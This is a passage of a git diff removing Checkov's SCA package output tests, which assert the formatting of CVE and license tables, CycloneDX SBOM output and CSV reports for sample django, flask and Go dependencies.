-    assert record.check_result == {"result": CheckResult.SKIPPED, "suppress_comment": "Filtered by package 'django'"}
-    assert record.code_block == [(0, "django: 1.2")]
-    assert (
-        record.description
-        == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..."
-    )
-    assert record.file_abs_path == file_abs_path
-    assert record.file_line_range == [0, 0]
-    assert record.file_path == f"/{rootless_file_path}"
-    assert record.repo_file_path == file_abs_path
-    assert record.resource == "requirements.txt.django"
-    assert record.severity == Severities[BcSeverities.CRITICAL]
-    assert record.short_description == "CVE-2019-19844 - django: 1.2"
-    assert record.vulnerability_details["lowest_fixed_version"] == "1.11.27"
-    assert record.vulnerability_details["fixed_versions"] == [
-        packaging_version.parse("3.0.1"),
-        packaging_version.parse("2.2.9"),
-        packaging_version.parse("1.11.27"),
-    ]
-    assert record.vulnerability_details["licenses"] == 'OSI_BDS'
-
-
-def test_calculate_lowest_compliant_version():
-    # given
-    package_versions_list = [
-        ["3.0.1", "2.2.9", "1.11.27", "1.9.8"],
-        ["1.9.8", "1.8.14"],
-        ["1.9.10", "1.8.15"],
-        ["3.2.4", "3.1.12", "2.2.24"],
-    ]
-
-    fix_versions_lists = [
-        [packaging_version.parse(version) for version in package_versions] for package_versions in package_versions_list
-    ]
-
-    # when
-    compliant_version = calculate_lowest_compliant_version(fix_versions_lists)
-
-    # then
-    assert compliant_version == "2.2.24"
-
-
-def test_create_cli_cves_table(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-    # given
-    file_path = "/path/to/requirements.txt"
-    cve_count = CveCount(total=6, critical=0, high=3, medium=2, low=0, skipped=1, has_fix=5, to_fix=5)
-    package_details_map = {
-        "django": {
-            "cves": [
-                {"id": "CVE-2016-7401", "severity": "high", "fixed_version": "1.8.15"},
-                {"id": "CVE-2016-6186", "severity": "medium", "fixed_version": "1.8.14"},
-                {"id": "CVE-2021-33203", "severity": "medium", "fixed_version": "2.2.24"},
-            ],
-            "current_version": "1.2",
-            "compliant_version": "2.2.24",
-        },
-        "flask": {
-            "cves": [
-                {"id": "CVE-2019-1010083", "severity": "high", "fixed_version": "1.0"},
-                {"id": "CVE-2018-1000656", "severity": "high", "fixed_version": "0.12.3"},
-            ],
-            "current_version": "0.6",
-            "compliant_version": "1.0",
-        },
-    }
-
-    # when
-    table = create_cli_cves_table(
-        file_path=file_path,
-        cve_count=cve_count,
-        package_details_map=package_details_map,
-    )
-
-    # then
-    assert table == "".join(
-        [
-            "\t/path/to/requirements.txt - CVEs Summary:\n",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n",
-            "\t│ Total CVEs: 6      │ critical: 0        │ high: 3            │ medium: 2          │ low: 0             │ skipped: 1         │\n",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n",
-            "\t│ To fix 5/5 CVEs, go to your Prisma Cloud account                                                                            │\n",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │\n",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n",
-            "\t│ django             │ CVE-2016-7401      │ high               │ 1.2                │ 1.8.15             │ 2.2.24             │\n",
-            "\t│                    │ CVE-2016-6186      │ medium             │                    │ 1.8.14             │                    │\n",
-            "\t│                    │ CVE-2021-33203     │ medium             │                    │ 2.2.24             │                    │\n",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n",
-            "\t│ flask              │ CVE-2019-1010083   │ high               │ 0.6                │ 1.0                │ 1.0                │\n",
-            "\t│                    │ CVE-2018-1000656   │ high               │                    │ 0.12.3             │                    │\n",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n",
-        ]
-    )
-
-
-def test_create_cli_license_violations_table(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-
-    # given
-    file_path = "/requirements.txt"
-
-    package_licenses_details_map = {
-        "django": [
-            {
-                "package_name": "django",
-                "package_version": "1.2",
-                "license": "DUMMY_LICENSE",
-                "status": "OPEN",
-                "policy": "BC_LIC_1"
-            },
-            {
-                "package_name": "django",
-                "package_version": "1.2",
-                "license": "DUMMY_LICENSE2",
-                "status": "OPEN",
-                "policy": "BC_LIC_1"
-            },
-        ],
-        "flask": [
-            {
-                "package_name": "flask",
-                "package_version": "0.6",
-                "license": "DUMMY_LICENSE3",
-                "status": "OPEN",
-                "policy": "BC_LIC_1"
-            },
-        ]
-    }
-
-    # when
-    table = create_cli_license_violations_table(
-        file_path=file_path,
-        package_licenses_details_map=package_licenses_details_map
-    )
-
-    # then
-    assert table == "".join(
-        [
-            "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n",
-            "\t│ Package name           │ Package version        │ Policy ID              │ License                │ Status                  │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ django                 │ 1.2                    │ BC_LIC_1               │ DUMMY_LICENSE          │ OPEN                    │\n",
-            "\t│                        │                        │ BC_LIC_1               │ DUMMY_LICENSE2         │ OPEN                    │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ flask                  │ 0.6                    │ BC_LIC_1               │ DUMMY_LICENSE3         │ OPEN                    │\n",
-            "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n",
-        ]
-    )
-
-
-def test_create_cli_cves_table_with_no_found_vulnerabilities(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-
-    # given
-    file_path = "/path/to/requirements.txt"
-    cve_count = CveCount(total=2, critical=0, high=0, medium=0, low=0, skipped=2, has_fix=0, to_fix=0)
-    package_details_map = {}
-
-    # when
-    table = create_cli_cves_table(
-        file_path=file_path,
-        cve_count=cve_count,
-        package_details_map=package_details_map,
-    )
-
-    # then
-    assert table == "".join(
-        [
-            "\t/path/to/requirements.txt - CVEs Summary:\n",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n",
-            "\t│ Total CVEs: 2      │ critical: 0        │ high: 0            │ medium: 0          │ low: 0             │ skipped: 2         │\n",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n",
-            "\t│ To fix 0/0 CVEs, go to your Prisma Cloud account                                                                            │\n",
-            "\t└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘\n",
-        ]
-    )
-
-
-def test_create_cli_output(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    license_statuses = [
-        {
-            "package_name": "django",
-            "package_version": "1.2",
-            "license": "DUMMY_LICENSE",
-            "status": "OPEN",
-            "policy": "BC_LIC_1"
-        },
-        {
-            "package_name": "flask",
-            "package_version": "0.6",
-            "license": "DUMMY_OTHER_LICENSE",  # not a real license. it is just for test a package with 2 licenses
-            "status": "OPEN",
-            "policy": "BC_LIC_1"
-        }
-    ]
-    # when
-    cves_records = [
-        create_report_cve_record(
-            rootless_file_path=rootless_file_path,
-            file_abs_path=file_abs_path,
-            check_class=check_class,
-            vulnerability_details=details,
-            licenses='Unknown',
-            package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-        )
-        for details in get_vulnerabilities_details()
-    ]
-    license_records = [
-            create_report_license_record(
-                rootless_file_path=rootless_file_path,
-                file_abs_path=file_abs_path,
-                check_class=check_class,
-                licenses_status=license_status,
-                package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-            )
-            for license_status in license_statuses
-        ]
-    cli_output = create_cli_output(True, cves_records + license_records)
-
-    # then
-    assert cli_output == "".join(
-        [
-            "\t/requirements.txt - CVEs Summary:\n",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n",
-            "\t│ Total CVEs: 2      │ critical: 1        │ high: 0            │ medium: 1          │ low: 0             │ skipped: 0         │\n",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n",
-            "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account                                                                            │\n",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │\n",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n",
-            "\t│ django             │ CVE-2019-19844     │ critical           │ 1.2                │ 1.11.27            │ 1.11.27            │\n",
-            "\t│                    │ CVE-2016-6186      │ medium             │                    │ 1.8.14             │                    │\n",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n",
-            "\n",
-            "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n",
-            "\t│ Package name           │ Package version        │ Policy ID              │ License                │ Status                  │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ django                 │ 1.2                    │ BC_LIC_1               │ DUMMY_LICENSE          │ FAILED                  │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ flask                  │ 0.6                    │ BC_LIC_1               │ DUMMY_OTHER_LICENSE    │ FAILED                  │\n",
-            "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n",
-        ]
-    )
-
-
-def test_create_cli_output_without_license_records(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    # when
-    cves_records = [
-        create_report_cve_record(
-            rootless_file_path=rootless_file_path,
-            file_abs_path=file_abs_path,
-            check_class=check_class,
-            vulnerability_details=details,
-            licenses='Unknown',
-            package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-        )
-        for details in get_vulnerabilities_details()
-    ]
-    cli_output = create_cli_output(True, cves_records)
-
-    # then
-    assert cli_output == "".join(
-        [
-            "\t/requirements.txt - CVEs Summary:\n",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n",
-            "\t│ Total CVEs: 2      │ critical: 1        │ high: 0            │ medium: 1          │ low: 0             │ skipped: 0         │\n",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n",
-            "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account                                                                            │\n",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │\n",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n",
-            "\t│ django             │ CVE-2019-19844     │ critical           │ 1.2                │ 1.11.27            │ 1.11.27            │\n",
-            "\t│                    │ CVE-2016-6186      │ medium             │                    │ 1.8.14             │                    │\n",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n",
-        ]
-    )
-
-
-def test_create_cli_output_without_cve_records(mocker):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    license_statuses = [
-        {
-            "package_name": "django",
-            "package_version": "1.2",
-            "license": "DUMMY_LICENSE",
-            "status": "OPEN",
-            "policy": "BC_LIC_1"
-        },
-        {
-            "package_name": "flask",
-            "package_version": "0.6",
-            "license": "DUMMY_OTHER_LICENSE",  # not a real license. it is just for test a package with 2 licenses
-            "status": "OPEN",
-            "policy": "BC_LIC_1"
-        }
-    ]
-    # when
-    license_records = [
-            create_report_license_record(
-                rootless_file_path=rootless_file_path,
-                file_abs_path=file_abs_path,
-                check_class=check_class,
-                licenses_status=license_status,
-                package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-            )
-            for license_status in license_statuses
-        ]
-    cli_output = create_cli_output(True, license_records)
-
-    # then
-    assert cli_output == "".join(
-        [
-            "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n",
-            "\t│ Package name           │ Package version        │ Policy ID              │ License                │ Status                  │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ django                 │ 1.2                    │ BC_LIC_1               │ DUMMY_LICENSE          │ FAILED                  │\n",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n",
-            "\t│ flask                  │ 0.6                    │ BC_LIC_1               │ DUMMY_OTHER_LICENSE    │ FAILED                  │\n",
-            "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n",
-        ]
-    )
diff --git a/tests/sca_package/test_output_reports.py b/tests/sca_package/test_output_reports.py
deleted file mode 100644
index f9057eab7f6..00000000000
--- a/tests/sca_package/test_output_reports.py
+++ /dev/null
@@ -1,744 +0,0 @@
-import json
-import xml
-import xml.dom.minidom
-import os
-from operator import itemgetter
-from pathlib import Path
-from typing import List
-
-from pytest_mock import MockerFixture
-
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.output.csv import CSVSBOM, FILE_NAME_OSS_PACKAGES
-from checkov.common.output.cyclonedx import CycloneDX
-from checkov.common.output.sarif import Sarif
-
-EXAMPLES_DIR = Path(__file__).parent / "examples"
-OUTPUTS_DIR = Path(__file__).parent / "outputs"
-
-
-def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List[str]:
-    # the lines with the fields "serialNumber", "bom-ref" and "timestamp" contain some not-deterministic data (uuids,
-    # timestamp). so we skip these lines by the first 'if when checking whether we get the expected results
-    # in addition also the line that display the checkov version may be changeable, so we skip it as well
-    # (in the second 'if')
-    black_list_words = ["bom-ref", "serialNumber", "timestamp", "bom", "xml"]
-    filtered_list = []
-    for i, line in enumerate(pretty_xml_as_list):
-        if not any(word in line for word in black_list_words):
-            if i == 0 or not any(tool_name in pretty_xml_as_list[i - 1] for tool_name in
-                                 ("<name>checkov</name>", "<name>cyclonedx-python-lib</name>")):
-                filtered_list.append(line)
-    return filtered_list
-
-
-def test_console_output(mocker, sca_package_report):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", False)
-    console_output = sca_package_report.print_console(False, False, None, None, False)
-
-    # then
-    assert console_output == "\n".join(
-        [
-            "sca_package scan results:",
-            "",
-            "Failed checks: 9, Skipped checks: 0",
-            "",
-            "\t/path/to/requirements.txt - CVEs Summary:",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐",
-            "\t│ Total CVEs: 6      │ critical: 1        │ high: 3            │ medium: 2          │ low: 0             │ skipped: 0         │",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤",
-            "\t│ To fix 6/6 CVEs, go to your Prisma Cloud account                                                                            │",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ flask              │ CVE-2019-1010083   │ high               │ 0.6                │ 1.0                │ 1.0                │",
-            "\t│                    │ CVE-2018-1000656   │ high               │                    │ 0.12.3             │                    │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ django             │ CVE-2019-19844     │ critical           │ 1.2                │ 1.11.27            │ 2.2.24             │",
-            "\t│                    │ CVE-2016-7401      │ high               │                    │ 1.8.15             │                    │",
-            "\t│                    │ CVE-2016-6186      │ medium             │                    │ 1.8.14             │                    │",
-            "\t│                    │ CVE-2021-33203     │ medium             │                    │ 2.2.24             │                    │",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘",
-            "",
-            "\t/path/to/requirements.txt - Licenses Statuses:",
-            "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐",
-            "\t│ Package name           │ Package version        │ Policy ID              │ License                │ Status                  │",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤",
-            "\t│ flask                  │ 0.6                    │ BC_LIC_1               │ DUMMY_OTHER_LICENSE    │ FAILED                  │",
-            "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘",
-            "",
-            "\t/path/to/go.sum - CVEs Summary:",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐",
-            "\t│ Total CVEs: 2      │ critical: 0        │ high: 2            │ medium: 0          │ low: 0             │ skipped: 0         │",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤",
-            "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account                                                                            │",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ golang.org/x/crypt │ CVE-2020-29652     │ high               │ v0.0.1             │ 0.0.2              │ 0.0.2              │",
-            "\t│ o                  │                    │                    │                    │                    │                    │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ github.com/dgrijal │ CVE-2020-26160     │ high               │ v3.2.0             │ 4.0.0rc1           │ 4.0.0rc1           │",
-            "\t│ va/jwt-go          │                    │                    │                    │                    │                    │",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘",
-            "",
-        ]
-    )
-
-
-def test_console_output_in_tty(mocker: MockerFixture, sca_package_report):
-    # simulate a tty call by enforcing color
-    mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"})
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", False)
-
-    console_output = sca_package_report.print_console(False, False, None, None, False)
-    # then
-    assert console_output == "\n".join(
-        [
-            "\x1b[34msca_package scan results:",
-            "\x1b[0m\x1b[36m",
-            "Failed checks: 9, Skipped checks: 0",
-            "",
-            "\x1b[0m\t/path/to/requirements.txt - CVEs Summary:",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐",
-            "\t│ Total CVEs: 6      │ critical: 1        │ high: 3            │ medium: 2          │ low: 0             │ skipped: 0         │",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤",
-            "\t│ To fix 6/6 CVEs, go to your Prisma Cloud account                                                                            │",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ flask              │ CVE-2019-1010083   │ high               │ 0.6                │ 1.0                │ 1.0                │",
-            "\t│                    │ CVE-2018-1000656   │ high               │                    │ 0.12.3             │                    │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ django             │ CVE-2019-19844     │ critical           │ 1.2                │ 1.11.27            │ 2.2.24             │",
-            "\t│                    │ CVE-2016-7401      │ high               │                    │ 1.8.15             │                    │",
-            "\t│                    │ CVE-2016-6186      │ medium             │                    │ 1.8.14             │                    │",
-            "\t│                    │ CVE-2021-33203     │ medium             │                    │ 2.2.24             │                    │",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘",
-            "",
-            "\t/path/to/requirements.txt - Licenses Statuses:",
-            "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐",
-            "\t│ Package name           │ Package version        │ Policy ID              │ License                │ Status                  │",
-            "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤",
-            "\t│ flask                  │ 0.6                    │ BC_LIC_1               │ DUMMY_OTHER_LICENSE    │ FAILED                  │",
-            "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘",
-            "",
-            "\t/path/to/go.sum - CVEs Summary:",
-            "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐",
-            "\t│ Total CVEs: 2      │ critical: 0        │ high: 2            │ medium: 0          │ low: 0             │ skipped: 0         │",
-            "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤",
-            "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account                                                                            │",
-            "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤",
-            "\t│ Package            │ CVE ID             │ Severity           │ Current version    │ Fixed version      │ Compliant version  │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ golang.org/x/crypt │ CVE-2020-29652     │ high               │ v0.0.1             │ 0.0.2              │ 0.0.2              │",
-            "\t│ o                  │                    │                    │                    │                    │                    │",
-            "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤",
-            "\t│ github.com/dgrijal │ CVE-2020-26160     │ high               │ v3.2.0             │ 4.0.0rc1           │ 4.0.0rc1           │",
-            "\t│ va/jwt-go          │                    │                    │                    │                    │                    │",
-            "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘",
-            "",
-        ]
-    )
-
-
-def test_get_cyclonedx_report(sca_package_report, tmp_path: Path):
-    cyclonedx_reports = [sca_package_report]
-    cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports)
-    cyclonedx_output = cyclonedx.get_xml_output()
-    pretty_xml_as_string = str(xml.dom.minidom.parseString(cyclonedx_output).toprettyxml())
-    with open(os.path.join(OUTPUTS_DIR, "results_cyclonedx.xml")) as f_xml:
-        expected_pretty_xml = f_xml.read()
-
-    actual_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(pretty_xml_as_string.split("\n"))
-    expected_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(expected_pretty_xml.split("\n"))
-
-    assert actual_pretty_xml_as_list == expected_pretty_xml_as_list
-
-
-def test_get_cyclonedx_report_with_licenses_with_comma(sca_package_report_with_comma_in_licenses, tmp_path: Path):
-    cyclonedx_reports = [sca_package_report_with_comma_in_licenses]
-    cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports)
-    cyclonedx_output = cyclonedx.get_xml_output()
-
-    pretty_xml_as_string = str(xml.dom.minidom.parseString(cyclonedx_output).toprettyxml())
-
-    with open(os.path.join(OUTPUTS_DIR, "results_cyclonedx_with_comma_in_licenses.xml")) as f_xml:
-        expected_pretty_xml = f_xml.read()
-
-    actual_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(pretty_xml_as_string.split("\n"))
-    expected_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(expected_pretty_xml.split("\n"))
-
-    assert actual_pretty_xml_as_list == expected_pretty_xml_as_list
-
-
-def test_get_cyclonedx_json_report_with_licenses_with_comma(tmp_path: Path, sca_package_report_with_comma_in_licenses):
-    # given
-    cyclonedx_reports = [sca_package_report_with_comma_in_licenses]
-    cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports)
-
-    #  when
-    output = json.loads(cyclonedx.get_json_output())
-
-    # then
-    assert output["$schema"] == "http://cyclonedx.org/schema/bom-1.4.schema.json"
-    assert len(output["components"]) == 8
-    assert len(output["dependencies"]) == 8
-    assert len(output["vulnerabilities"]) == 8
-
-    assert sorted(output["components"], key=itemgetter("purl")) == sorted([
-        {
-            "type": "library",
-            "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2",
-            "name": "django",
-            "version": "1.2",
-            "licenses": [{"license": {"name": "OSI_BDS"}}],
-            "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6",
-            "name": "flask",
-            "version": "0.6",
-            "licenses": [
-                {"license": {"name": "DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE"}},
-                {"license": {"name": "OSI_APACHE"}},
-            ],
-            "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0",
-            "name": "github.com/dgrijalva/jwt-go",
-            "version": "v3.2.0",
-            "licenses": [{"license": {"name": "Unknown"}}],
-            "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41",
-            "name": "github.com/miekg/dns",
-            "version": "v1.1.41",
-            "licenses": [{"license": {"name": "Unknown"}}],
-            "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90",
-            "name": "github.com/prometheus/client_model",
-            "version": "v0.0.0-20190129233127-fd36f4220a90",
-            "licenses": [{"license": {"name": "Unknown"}}],
-            "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1",
-            "name": "golang.org/x/crypto",
-            "version": "v0.0.1",
-            "licenses": [{"license": {"name": "Unknown"}}],
-            "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0",
-            "name": "requests",
-            "version": "2.26.0",
-            "licenses": [{"license": {"name": "OSI_APACHE"}}],
-            "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0",
-        },
-        {
-            "type": "library",
-            "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0",
-            "name": "requests",
-            "version": "2.26.0",
-            "licenses": [{"license": {"name": "OSI_APACHE"}}],
-            "purl": "pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0",
-        },
-    ], key=itemgetter("purl"))
-
-
-def test_get_csv_report(sca_package_report, tmp_path: Path):
-    csv_sbom_report = CSVSBOM()
-    csv_sbom_report.add_report(report=sca_package_report, git_org="acme", git_repository="bridgecrewio/example")
-    csv_sbom_report.persist_report_oss_packages(file_name=FILE_NAME_OSS_PACKAGES, is_api_key=True,
-                                                output_path=str(tmp_path))
-    output_file_path = tmp_path / FILE_NAME_OSS_PACKAGES
-    csv_output = output_file_path.read_text()
-    csv_output_str = csv_sbom_report.get_csv_output_packages(check_type=CheckType.SCA_PACKAGE)
-
-    # then
-    expected_csv_output = [
-        'Package,Version,Path,Line(s),Git Org,Git Repository,Vulnerability,Severity,Description,Licenses,Fix Version,Registry URL,Root Package,Root Version',
-        'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-19844,CRITICAL,"Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",OSI_BDS,1.11.27,,,',
